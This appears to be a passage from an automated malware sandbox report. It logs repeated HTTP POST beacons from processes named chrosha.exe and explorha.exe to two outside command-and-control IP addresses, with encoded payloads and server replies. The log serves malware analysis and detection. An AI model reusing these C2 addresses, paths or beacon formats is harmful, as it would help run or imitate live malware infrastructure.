                                                                                                                                                                                                                                      Apr 19, 2024 03:31:39.060906887 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:39.308111906 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      365192.168.2.550209193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:39.385586023 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:39.629930019 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      366192.168.2.550210193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:39.668561935 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:39.917165995 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      367192.168.2.550211193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:39.877302885 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:40.121835947 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      368192.168.2.550212193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:40.182116985 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:40.437736988 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      369192.168.2.550213193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:40.480629921 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:40.729231119 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      370192.168.2.550214193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:40.803510904 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:41.044143915 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      371192.168.2.550215193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:40.983812094 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:41.235631943 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      372192.168.2.550216193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:41.301429033 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:41.555306911 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      373192.168.2.550217193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:41.602381945 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:41.850049973 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      374192.168.2.550218193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:41.915607929 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:42.160024881 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      375192.168.2.550219193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:42.108835936 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:42.364526033 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      376192.168.2.550220193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:42.412883043 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:42.661989927 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      377192.168.2.550221193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:42.727035999 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:42.974965096 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      378192.168.2.550222193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:43.029788971 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:43.274291992 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      379192.168.2.550223193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:43.232500076 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:43.491569042 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      380192.168.2.550224193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:43.526215076 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
